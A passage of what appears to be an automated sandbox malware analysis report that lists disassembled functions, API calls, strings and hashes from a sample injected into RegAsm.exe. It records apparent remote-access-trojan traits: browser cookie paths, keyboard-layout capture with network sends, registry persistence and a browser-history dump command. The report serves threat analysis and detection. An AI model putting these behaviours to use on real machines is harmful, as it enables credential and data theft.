                                                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                              • String ID: KeepAlive | Disabled
                                                                                              • API String ID: 2993684571-305739064
                                                                                              • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                              • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                              • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                              • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                              Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                              • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                              • String ID: Alarm triggered
                                                                                              • API String ID: 614609389-2816303416
                                                                                              • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                              • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                              • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                              • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                              Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                              • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                                                              Strings
                                                                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                              • API String ID: 3024135584-2418719853
                                                                                              • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                              • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                              • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                              • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                              Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                              • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                              • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                              • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                              Function 004493E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                              • _free.LIBCMT ref: 0044943D
                                                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                              • _free.LIBCMT ref: 00449609
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                              • String ID:
                                                                                              • API String ID: 1286116820-0
                                                                                              • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                              • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                                              • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                              • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                                              Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 4269425633-0
                                                                                              • Opcode ID: c381317e121d3153570d3149947424a859d37f2118057eb93c2305807e088934
                                                                                              • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                              • Opcode Fuzzy Hash: c381317e121d3153570d3149947424a859d37f2118057eb93c2305807e088934
                                                                                              • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                              Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free
                                                                                              • String ID:
                                                                                              • API String ID: 269201875-0
                                                                                              • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                              • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                              • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                              • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                              Function 004511AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                              • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                              • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                              • __freea.LIBCMT ref: 0045129D
                                                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                              • String ID:
                                                                                              • API String ID: 313313983-0
                                                                                              • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                              • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                              • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                              • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                              Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                              • _free.LIBCMT ref: 0044F43F
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                              • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                              • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                              • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                              Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                              • _free.LIBCMT ref: 00448353
                                                                                              • _free.LIBCMT ref: 0044837A
                                                                                              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                              • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                              • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                              • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                              • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                              Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00450A54
                                                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                              • _free.LIBCMT ref: 00450A66
                                                                                              • _free.LIBCMT ref: 00450A78
                                                                                              • _free.LIBCMT ref: 00450A8A
                                                                                              • _free.LIBCMT ref: 00450A9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                              • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                              • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                              • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                              Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00444106
                                                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                              • _free.LIBCMT ref: 00444118
                                                                                              • _free.LIBCMT ref: 0044412B
                                                                                              • _free.LIBCMT ref: 0044413C
                                                                                              • _free.LIBCMT ref: 0044414D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                              • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                              • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                              • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                              Function 0044E769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                              • _free.LIBCMT ref: 0044E8D5
                                                                                                • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                                                                • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                                • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                              • String ID: *?$.
                                                                                              • API String ID: 2812119850-3972193922
                                                                                              • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                              • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                                              • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                              • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                                              Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CountEventTick
                                                                                              • String ID: !D@$NG
                                                                                              • API String ID: 180926312-2721294649
                                                                                              • Opcode ID: 32ecce1a71cb5e06d1939da9d595255532b4074999e3957685bf9650ac416246
                                                                                              • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                                              • Opcode Fuzzy Hash: 32ecce1a71cb5e06d1939da9d595255532b4074999e3957685bf9650ac416246
                                                                                              • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                                              Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                              • String ID: XQG$NG$PG
                                                                                              • API String ID: 1634807452-3565412412
                                                                                              • Opcode ID: 644eb4b595694a16fd107ceb231ab55b3c7b899bb583e719b99700484c5aaa34
                                                                                              • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                                              • Opcode Fuzzy Hash: 644eb4b595694a16fd107ceb231ab55b3c7b899bb583e719b99700484c5aaa34
                                                                                              • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                                              Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                                              • _free.LIBCMT ref: 004435E0
                                                                                              • _free.LIBCMT ref: 004435EA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              • API String ID: 2506810119-1068371695
                                                                                              • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                              • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                              • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                              • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                              Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636B1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                              • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                              • String ID: /sort "Visit Time" /stext "$0NG
                                                                                              • API String ID: 368326130-3219657780
                                                                                              • Opcode ID: 38603f56d146c6edc1649b327761de0d025e6f1c59de35fee92e20854b51a343
                                                                                              • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                              • Opcode Fuzzy Hash: 38603f56d146c6edc1649b327761de0d025e6f1c59de35fee92e20854b51a343
                                                                                              • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                                              Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00416330
                                                                                                • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                                • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CloseCreateValue
                                                                                              • String ID: !D@$okmode$PG
                                                                                              • API String ID: 3411444782-3370592832
                                                                                              • Opcode ID: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                                                              • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                                              • Opcode Fuzzy Hash: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                                                              • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                                              Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                                                              Strings
                                                                                              • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                              • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExistsFilePath
                                                                                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                              • API String ID: 1174141254-1980882731
                                                                                              • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                              • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                              • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                              • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                              Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                                                              Strings
